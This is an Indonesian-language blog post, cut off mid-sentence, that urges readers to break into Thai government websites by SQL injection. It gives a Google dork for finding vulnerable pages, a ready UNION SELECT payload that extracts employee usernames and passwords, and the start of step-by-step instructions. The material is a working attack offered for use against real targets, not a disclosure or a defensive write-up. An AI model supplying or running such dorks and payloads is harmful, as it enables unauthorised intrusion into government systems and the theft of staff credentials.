You are here
Home > Posts tagged "SQL Injection"

Thailand Government SQL Injection Vulnerability

Thailand government sql injection vulnerability

Situs - situs pemerintahan thailand, banyak sekali yang memiliki kerentanan dan mudah diinjeksi. Hanya cukup dengan melakukan sql injection, kalian dapat menyusupi database dari situs target. Vuln ini sebenarnya sudah lama ditemukan dan saya pun pernah membuat write upnya di laman facebook, namun entah kenapa tidak ada perbaikan dari pihak admin website pemerintah thailand. Dan bukan cuma satu dua, tapi hampir semua situs masih dapat disusupi menggunakan sql injection. Tanpa perlu tools seperti havij dan sqlmap, ataupun injeksi secara manual. Disini saya akan memberi dork beserta exploit yang akan langsung mengkuak database websitenya. Dork: inurl:plantype_id= main.php Exploit: -69+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+m_employee--+- Gatau apa itu dork? Baca artikel Google hacking gan. Kalo udah, yuk langsung aja 1.Dorking menggunakan dork diatas 2.Terus buka - bukain deh situsnya 3.Kemudian ganti angka pada plantype_id= menggunakan

Top